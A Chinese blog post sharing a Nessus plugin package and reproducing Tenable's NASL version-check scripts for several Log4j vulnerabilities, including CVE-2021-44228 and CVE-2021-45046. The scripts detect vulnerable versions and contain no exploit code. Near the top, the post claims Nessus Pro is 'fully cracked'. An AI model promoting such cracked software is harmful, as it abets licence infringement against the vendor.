Nessus最新插件包20220113

相关阅读

完整版安装方法以前讲过,这里不再赘述

常见问题我们这里也进行了总结

更新软件/插件

插件包下载

试用版和Pro版区别

  • Nessus Pro已经完整破解,请参考之前的文章
图片[1]-Nessus最新插件包20220113-FancyPig's blog

其他补充

Log4j的nasl脚本

之前很多人问的log4j,NASL相关脚本有没有?其实在插件包里都有,搜索log4j关键词即可

  • apache_log4j_1_2.nasl
#%NASL_MIN_LEVEL 70300
##
# (C) Tenable Network Security, Inc.
##

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(156103);
  script_version("1.6");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/12/28");

  script_cve_id("CVE-2021-4104");
  script_xref(name:"IAVA", value:"2021-A-0573");

  script_name(english:"Apache Log4j 1.2 JMSAppender Remote Code Execution (CVE-2021-4104)");

  script_set_attribute(attribute:"synopsis", value:
"A package installed on the remote host is affected by a remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of Apache Log4j on the remote host is 1.2. It is, therefore, affected by a remote code execution
vulnerability when specifically configured to use JMSAppender.

Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version
number.");
  # https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?33485eac");
  script_set_attribute(attribute:"see_also", value:"https://access.redhat.com/security/cve/CVE-2021-4104");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Apache Log4j version 2.16.0 or later since 1.x is end of life.

Upgrading to the latest versions for Apache Log4j is highly recommended as intermediate 
versions / patches have known high severity vulnerabilities and the vendor is updating 
their advisories often as new research and knowledge about the impact of Log4j is 
discovered. Refer to https://logging.apache.org/log4j/2.x/security.html for the latest 
versions.");
  script_set_attribute(attribute:"agent", value:"all");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2021-4104");

  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");

  script_set_attribute(attribute:"vuln_publication_date", value:"2021/12/14");
  script_set_attribute(attribute:"patch_publication_date", value:"2021/12/14");
  script_set_attribute(attribute:"plugin_publication_date", value:"2021/12/15");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:log4j");
  script_set_attribute(attribute:"stig_severity", value:"I");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Misc.");

  script_copyright(english:"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("apache_log4j_nix_installed.nbin", "apache_log4j_win_installed.nbin");
  script_require_keys("installed_sw/Apache Log4j");

  exit(0);
}

include('vcf.inc');

var app = 'Apache Log4j';

var app_info = vcf::get_app_info(app:app);

if (app_info['JMSAppender.class association'] == "Not Found")
  audit(AUDIT_OS_CONF_NOT_VULN, app, app_info.version);

var constraints = [{ 'min_version':'1.2.0', 'max_version':'1.2.17', 'fixed_version':'2.16.0' }];

vcf::check_version_and_report(
  app_info:app_info,
  constraints:constraints,
  severity:SECURITY_WARNING
);
  • apache_log4j_2_13_2.nasl
#
# (C) Tenable Network Security, Inc.
#

include('compat.inc');

if (description)
{
  script_id(136424);
  script_version("1.3");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/12/13");

  script_cve_id("CVE-2020-9488");
  script_xref(name:"IAVA", value:"2020-A-0196-S");

  script_name(english:"Apache Log4j < 2.13.2 Improper Certificate Verification");

  script_set_attribute(attribute:"synopsis", value:
"A package installed on the remote host is affected by an improper certificate verification vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of Apache Log4j on the remote host is < 2.13.2. It is, therefore, affected by 
an improper certificate validation vulnerability in the log4j SMTP appender. An 
attacker could leverage this vulnerability to perform a man-in-the-middle attack.

Note that Nessus has not tested for these issues but has instead
relied only on the application's self-reported version number.");
  script_set_attribute(attribute:"see_also", value:"https://issues.apache.org/jira/browse/LOG4J2-2819");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Apache Log4j version 2.13.2 or later.");
  script_set_attribute(attribute:"agent", value:"unix");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2020-9488");

  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");

  script_set_attribute(attribute:"vuln_publication_date", value:"2020/04/13");
  script_set_attribute(attribute:"patch_publication_date", value:"2020/04/21");
  script_set_attribute(attribute:"plugin_publication_date", value:"2020/05/08");

  script_set_attribute(attribute:"potential_vulnerability", value:"true");
  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:log4j");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:log4j");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fermilab:scientific_linux:log4j");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:log4j");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:log4j");
  script_set_attribute(attribute:"stig_severity", value:"II");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Misc.");

  script_copyright(english:"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Settings/ParanoidReport");

  exit(0);
}

distros = make_list(
  'Host/RedHat/rpm-list',
  'Host/Gentoo/qpkg-list',
  'Host/SuSE/rpm-list',
  'Host/CentOS/rpm-list'
);

pkgs_list = make_array();

distro = '';

foreach pkgmgr (distros)
{
  pkgs = get_kb_item(pkgmgr);
  sep = '\n';
  if(!isnull(pkgs) && 'log4j' >< pkgs)
  {
    distro = pkgmgr;
    foreach pkg (split(pkgs,sep:sep,keep:FALSE))
    {
      match = pregmatch(pattern:"(?:\s|^)(?:apache-)?log4j2?-([0-9.-]+[0-9]+).*", string:pkg);
      if(!empty_or_null(match) && !empty_or_null(match[1]))
      {
        if("-" >< match[1])
          pkgs_list[pkg] = str_replace(string: match[1], find:'-', replace:'.');
        else pkgs_list[pkg] = match[1];
      }
    }
  }
}

flag = 0;
vulnerable_pkgs = '';

if(!empty_or_null(pkgs_list))
{
  foreach pkg (keys(pkgs_list))
  {
    ver = pkgs_list[pkg];
    if ((empty_or_null(ver)) || (ver !~ "(?!^.*\.\..*$)^[0-9][0-9.]+?$")) continue;
    if(ver_compare(ver:ver, fix:'2.13.2', strict:FALSE) < 0)
    {
      vulnerable_pkgs += '  ' + pkg + '\n';
      flag++;
    }
  }
}
else audit(AUDIT_NOT_INST, 'Apache Log4j');

if (report_paranoia < 2) audit(AUDIT_PARANOID);

if(flag > 0)
{
  report = '\nThe following packages are associated with a vulnerable version of log4j : \n\n';
  report += vulnerable_pkgs;
  report += '\nFixed version : Log4j 2.13.2\n';
  security_report_v4(severity:SECURITY_WARNING, extra:report, port:0);
}
else audit(AUDIT_INST_VER_NOT_VULN, 'Apache Log4j');
  • apache_log4j_2_15_0.nasl
#%NASL_MIN_LEVEL 70300
##
# (C) Tenable Network Security, Inc.
##

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(155999);
  script_version("1.13");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/12/21");

  script_cve_id("CVE-2021-44228");
  script_xref(name:"IAVA", value:"2021-A-0573");
  script_xref(name:"CISA-KNOWN-EXPLOITED", value:"2021/12/24");

  script_name(english:"Apache Log4j < 2.15.0 Remote Code Execution (Nix)");

  script_set_attribute(attribute:"synopsis", value:
"A package installed on the remote host is affected by a remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of Apache Log4j on the remote host is 2.x < 2.15.0. It is, therefore, affected by a remote code execution
vulnerability in the JDNI parser due to improper log validation. An unauthenticated, remote attacker can exploit this
to bypass authentication and execute arbitrary commands. 

Log4j 1.x, which reached its End of Life prior to 2016, comes with JMSAppender which will perform a JNDI lookup if
enabled in Log4j's configuration file, hence customers should evaluate triggers in 1.x based on the risk that it is EOL
and whether JNDI lookups are enabled.

Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version
number.");
  script_set_attribute(attribute:"see_also", value:"https://github.com/apache/logging-log4j2/pull/608");
  script_set_attribute(attribute:"see_also", value:"https://logging.apache.org/log4j/2.x/security.html");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Apache Log4j version 2.15.0 or later, or apply the vendor mitigation.

Upgrading to the latest versions for Apache Log4j is highly recommended as intermediate 
versions / patches have known high severity vulnerabilities and the vendor is updating 
their advisories often as new research and knowledge about the impact of Log4j is 
discovered. Refer to https://logging.apache.org/log4j/2.x/security.html for the latest 
versions.");
  script_set_attribute(attribute:"agent", value:"unix");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2021-44228");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2021/12/09");
  script_set_attribute(attribute:"patch_publication_date", value:"2021/12/09");
  script_set_attribute(attribute:"plugin_publication_date", value:"2021/12/10");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:log4j");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:log4j");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fermilab:scientific_linux:log4j");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:log4j");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:log4j");
  script_set_attribute(attribute:"stig_severity", value:"I");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Misc.");

  script_copyright(english:"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("apache_log4j_nix_installed.nbin");
  script_require_keys("installed_sw/Apache Log4j", "Host/local_checks_enabled");

  exit(0);
}

include('vcf.inc');

var app = 'Apache Log4j';

var app_info = vcf::get_app_info(app:app);

if (app_info['JndiLookup.class association'] == "Not Found")
  audit(AUDIT_OS_CONF_NOT_VULN, app, app_info.version);

var constraints = [{ 'min_version' : '2.0', 'fixed_version' : '2.15.0' }];

vcf::check_version_and_report(
  app_info:app_info,
  constraints:constraints,
  severity:SECURITY_HOLE
);
  • apache_log4j_2_16_0.nasl
#%NASL_MIN_LEVEL 70300
##
# (C) Tenable Network Security, Inc.
##

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(156057);
  script_version("1.9");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/12/22");

  script_cve_id("CVE-2021-45046");
  script_xref(name:"IAVA", value:"2021-A-0573");
  script_xref(name:"IAVA", value:"2021-A-0598");
  script_xref(name:"IAVA", value:"2021-A-0597");
  script_xref(name:"IAVA", value:"2021-A-0596");

  script_name(english:"Apache Log4j 2.x < 2.16.0 RCE");

  script_set_attribute(attribute:"synopsis", value:
"A package installed on the remote host is affected by a remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of Apache Log4j on the remote host is 2.x < 2.16.0. It is, therefore, affected by a remote code 
execution vulnerability. The fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain 
non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data 
when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, 
$${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using 
a JNDI Lookup pattern resulting in a remote code execution (RCE) attack.

Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version
number.");
  script_set_attribute(attribute:"see_also", value:"https://github.com/advisories/GHSA-7rjr-3q55-vv33");
  script_set_attribute(attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2021-45046");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Apache Log4j version 2.16.0 or later, or apply the vendor mitigation.

Upgrading to the latest versions for Apache Log4j is highly recommended as intermediate 
versions / patches have known high severity vulnerabilities and the vendor is updating 
their advisories often as new research and knowledge about the impact of Log4j is 
discovered. Refer to https://logging.apache.org/log4j/2.x/security.html for the latest 
versions.");
  script_set_attribute(attribute:"agent", value:"all");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2021-45046");

  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");

  script_set_attribute(attribute:"vuln_publication_date", value:"2021/12/14");
  script_set_attribute(attribute:"patch_publication_date", value:"2021/12/14");
  script_set_attribute(attribute:"plugin_publication_date", value:"2021/12/14");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:log4j");
  script_set_attribute(attribute:"stig_severity", value:"I");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Misc.");

  script_copyright(english:"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("apache_log4j_nix_installed.nbin", "apache_log4j_win_installed.nbin");
  script_require_keys("installed_sw/Apache Log4j");

  exit(0);
}

include('vcf.inc');

var app = 'Apache Log4j';

var app_info = vcf::get_app_info(app:app);

if (app_info['JndiLookup.class association'] == "Not Found")
  audit(AUDIT_OS_CONF_NOT_VULN, app, app_info.version);

var constraints = [{ 'min_version' : '2.0', 'fixed_version' : '2.16.0' }];

vcf::check_version_and_report(
  app_info:app_info,
  constraints:constraints,
  severity:SECURITY_WARNING
);
  • apache_log4j_2_16_0_mac.nasl
#%NASL_MIN_LEVEL 70300
##
# (C) Tenable Network Security, Inc.
##

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(156165);
  script_version("1.6");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/12/23");

  script_cve_id("CVE-2021-45046");
  script_xref(name:"IAVA", value:"2021-A-0573");
  script_xref(name:"IAVA", value:"2021-A-0596");
  script_xref(name:"IAVA", value:"2021-A-0598");

  script_name(english:"Apache Log4j 2.x < 2.16.0 RCE (MacOS)");

  script_set_attribute(attribute:"synopsis", value:
"A package installed on the remote host is affected by a remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of Apache Log4j on the remote host is 2.x < 2.16.0. It is, therefore, affected by a remote code 
execution vulnerability. It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was 
incomplete in certain non-default configurations. When the logging configuration uses a non-default 
Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread 
Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern, resulting in an 
information leak and remote code execution in some environments and local code execution in all environments; 
remote code execution has been demonstrated on macOS but no other tested environments.

Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version
number.");
  script_set_attribute(attribute:"see_also", value:"https://logging.apache.org/log4j/2.x/security.html");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Apache Log4j version 2.16.0 or later, or apply the vendor mitigation.

Upgrading to the latest versions for Apache Log4j is highly recommended as intermediate 
versions / patches have known high severity vulnerabilities and the vendor is updating 
their advisories often as new research and knowledge about the impact of Log4j is 
discovered. Refer to https://logging.apache.org/log4j/2.x/security.html for the latest 
versions.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2021-45046");

  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");

  script_set_attribute(attribute:"vuln_publication_date", value:"2021/12/14");
  script_set_attribute(attribute:"patch_publication_date", value:"2021/12/14");
  script_set_attribute(attribute:"plugin_publication_date", value:"2021/12/17");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:log4j");
  script_set_attribute(attribute:"stig_severity", value:"I");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"MacOS X Local Security Checks");

  script_copyright(english:"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("apache_log4j_nix_installed.nbin", "ssh_get_info.nasl");
  script_require_keys("installed_sw/Apache Log4j", "Host/MacOSX/Version");

  exit(0);
}

include('vcf.inc');

# only seems to behave like a fully-fledged RCE for macos for so far
get_kb_item_or_exit('Host/MacOSX/Version');

var app = 'Apache Log4j';

var app_info = vcf::get_app_info(app:app);

var constraints = [{ 'min_version' : '2.0', 'fixed_version' : '2.16.0' }];

vcf::check_version_and_report(
  app_info:app_info,
  constraints:constraints,
  severity:SECURITY_WARNING
);
  • apache_log4j_2_17_0.nasl
#%NASL_MIN_LEVEL 70300
##
# (C) Tenable Network Security, Inc.
##

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(156183);
  script_version("1.6");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/12/23");

  script_cve_id("CVE-2021-45105");
  script_xref(name:"IAVA", value:"2021-A-0573");
  script_xref(name:"IAVA", value:"2021-A-0598");

  script_name(english:"Apache Log4j 2.x < 2.17.0 DoS");

  script_set_attribute(attribute:"synopsis", value:
"A package installed on the remote host is affected by a denial of service vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of Apache Log4j on the remote host is 2.x < 2.17.0. It is, therefore, affected by a denial of service 
vulnerability. Apache Log4j2 versions 2.0-alpha1 through 2.16.0 did not protect from uncontrolled recursion from 
self-referential lookups. When the logging configuration uses a non-default Pattern Layout with a Context Lookup 
(for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious 
input data that contains a recursive lookup, resulting in a StackOverflowError that will terminate the process.

Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version
number.");
  script_set_attribute(attribute:"see_also", value:"https://github.com/advisories/GHSA-p6xc-xr62-6r2g");
  script_set_attribute(attribute:"see_also", value:"https://logging.apache.org/log4j/2.x/security.html");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Apache Log4j version 2.17.0 or later, or apply the vendor mitigation.

Upgrading to the latest versions for Apache Log4j is highly recommended as intermediate 
versions / patches have known high severity vulnerabilities and the vendor is updating 
their advisories often as new research and knowledge about the impact of Log4j is 
discovered. Refer to https://logging.apache.org/log4j/2.x/security.html for the latest 
versions.");
  script_set_attribute(attribute:"agent", value:"all");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2021-45105");

  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");

  script_set_attribute(attribute:"vuln_publication_date", value:"2021/12/18");
  script_set_attribute(attribute:"patch_publication_date", value:"2021/12/18");
  script_set_attribute(attribute:"plugin_publication_date", value:"2021/12/18");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:log4j");
  script_set_attribute(attribute:"stig_severity", value:"I");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Misc.");

  script_copyright(english:"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("apache_log4j_nix_installed.nbin", "apache_log4j_win_installed.nbin");
  script_require_keys("installed_sw/Apache Log4j");

  exit(0);
}

include('vcf.inc');

var app = 'Apache Log4j';

var app_info = vcf::get_app_info(app:app);

var constraints = [{ 'min_version' : '2.0', 'fixed_version' : '2.17.0' }];

vcf::check_version_and_report(
  app_info:app_info,
  constraints:constraints,
  severity:SECURITY_WARNING
);
  • apache_log4j_2_17_0_mac.nasl
#%NASL_MIN_LEVEL 70300
##
# (C) Tenable Network Security, Inc.
#
# @DEPRECATED@
#
# Disabled on 2020/12/19. Deprecated by apache_log4j_2_17_0.nasl.
##

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(156184);
  script_version("1.4");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/12/21");

  script_cve_id("CVE-2021-45105");
  
  script_xref(name:"IAVA", value:"2021-A-0573");

  script_name(english:"Apache Log4j 2.x < 2.17.0 DoS (deprecated)");

  script_set_attribute(attribute:"synopsis", value:
"This plugin has been deprecated.");
  script_set_attribute(attribute:"description", value:
"This plugin has been deprecated as a duplicated of apache_log4j_2_17_0.nasl (156183).");

  script_set_attribute(attribute:"see_also", value:"https://github.com/advisories/GHSA-p6xc-xr62-6r2g");  
  script_set_attribute(attribute:"see_also", value:"https://logging.apache.org/log4j/2.x/security.html");  

  script_set_attribute(attribute:"solution", value:
"n/a.");
  script_set_attribute(attribute:"agent", value:"unix");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2021-45105");

  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");

  script_set_attribute(attribute:"vuln_publication_date", value:"2021/12/18");
  script_set_attribute(attribute:"patch_publication_date", value:"2021/12/18");
  script_set_attribute(attribute:"plugin_publication_date", value:"2021/12/18");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:log4j");
  script_set_attribute(attribute:"stig_severity", value:"I");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"MacOS X Local Security Checks");

  script_copyright(english:"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("apache_log4j_nix_installed.nbin", "ssh_get_info.nasl");
  script_require_keys("installed_sw/Apache Log4j", "Host/MacOSX/Version");

  exit(0);
}

exit(0, 'This plugin has been deprecated as a duplicated of apache_log4j_2_17_0.nasl (156183). Use 156183 instead');
  • apache_log4j_2_17_1.nasl
#%NASL_MIN_LEVEL 70300
##
# (C) Tenable Network Security, Inc.
##

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(156327);
  script_version("1.1");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/12/28");

  script_cve_id("CVE-2021-44832");

  script_name(english:"Apache Log4j 2.0 < 2.3.2 / 2.4 < 2.12.4 / 2.13 < 2.17.1 RCE");

  script_set_attribute(attribute:"synopsis", value:
"A package installed on the remote host is affected by a remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of Apache Log4j on the remote host is 2.0 < 2.3.2, 2.4 < 2.12.4, or 2.13 < 2.17.1. It is, therefore,
affected by a remote code execution vulnerability. Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security
fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack where an attacker with permission
to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data
source referencing a JNDI URI which can execute remote code. This issue is fixed by limiting JNDI data source names to
the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2. 

Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version
number.");
  script_set_attribute(attribute:"see_also", value:"https://logging.apache.org/log4j/2.x/security.html");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Apache Log4j version 2.17.1, 2.12.4, or 2.3.2 or later, or apply the vendor mitigation.

Upgrading to the latest versions for Apache Log4j is highly recommended as intermediate 
versions / patches have known high severity vulnerabilities and the vendor is updating 
their advisories often as new research and knowledge about the impact of Log4j is 
discovered. Refer to https://logging.apache.org/log4j/2.x/security.html for the latest 
versions.");
  script_set_attribute(attribute:"agent", value:"all");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:S/C:C/I:C/A:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2021-44832");

  script_set_attribute(attribute:"vuln_publication_date", value:"2021/12/28");
  script_set_attribute(attribute:"patch_publication_date", value:"2021/12/28");
  script_set_attribute(attribute:"plugin_publication_date", value:"2021/12/28");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:log4j");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Misc.");

  script_copyright(english:"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("apache_log4j_nix_installed.nbin", "apache_log4j_win_installed.nbin");
  script_require_keys("installed_sw/Apache Log4j");

  exit(0);
}

include('vcf.inc');

var app = 'Apache Log4j';

var app_info = vcf::get_app_info(app:app);

var constraints = [
  {'min_version':'2.0', 'fixed_version':'2.3.2'},
  {'min_version':'2.4', 'fixed_version':'2.12.4'},
  {'min_version':'2.13', 'fixed_version':'2.17.1'}
];

vcf::check_version_and_report(
  app_info:app_info,
  constraints:constraints,
  severity:SECURITY_HOLE
);

  • apache_log4j_unsupported.nasl
#%NASL_MIN_LEVEL 70300
##
# (C) Tenable Network Security, Inc.
##

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(156032);
  script_version("1.2");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/12/19");

  script_name(english:"Apache Log4j Unsupported Version Detection");

  script_set_attribute(attribute:"synopsis", value:
"A logging library running on the remote host is no longer supported.");
  script_set_attribute(attribute:"description", value:
"According to its self-reported version number, the installation of Apache Log4j on the remote host is no longer
supported. Log4j reached its end of life prior to 2016.

Lack of support implies that no new security patches for the product will be released by the vendor. As a result, it is
likely to contain security vulnerabilities.");
  # https://blogs.apache.org/foundation/entry/apache_logging_services_project_announces
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?59f655a2");
  script_set_attribute(attribute:"solution", value:
"Upgrade to a version of Apache Log4j that is currently supported.

Upgrading to the latest versions for Apache Log4j is highly recommended as intermediate 
versions / patches have known high severity vulnerabilities and the vendor is updating 
their advisories often as new research and knowledge about the impact of Log4j is 
discovered. Refer to https://logging.apache.org/log4j/2.x/security.html for the latest 
versions.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H");
  script_set_attribute(attribute:"cvss_score_source", value:"manual");
  script_set_attribute(attribute:"cvss_score_rationale", value:"Tenable score for unsupported software.");
  script_set_attribute(attribute:"agent", value:"all");

  script_set_attribute(attribute:"plugin_publication_date", value:"2021/12/13");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:log4j");
  script_set_attribute(attribute:"unsupported_by_vendor", value:"true");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Misc.");

  script_copyright(english:"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("apache_log4j_win_installed.nbin", "apache_log4j_nix_installed.nbin");
  script_require_keys("installed_sw/Apache Log4j");

  exit(0);
}

include('vcf.inc');

var app = 'Apache Log4j';
var win_local = FALSE;

if (get_kb_item('SMB/Registry/Enumerated'))
  win_local = TRUE;

var app_info = vcf::get_app_info(app:app, win_local:win_local);

var ver  = app_info['version'];
var path = app_info['path'];
var port = app_info['port'];

if (!port)
  port = 0;

# Versions < 2 are EOL, so audit if version >= 2
if (ver_compare(ver:ver, fix:'2.0', strict:FALSE) >= 0)
  vcf::audit(app_info);

register_unsupported_product(
  product_name : app,
  cpe_base     : 'apache:log4j',
  cpe_class    : CPE_CLASS_APPLICATION,
  is_custom_cpe: FALSE,
  version      : ver
);

var report = strcat(
  '\n  Path              : ', path,
  '\n  Installed version : ', ver,
  '\n');

security_report_v4(severity:SECURITY_HOLE, port:port, extra:report);
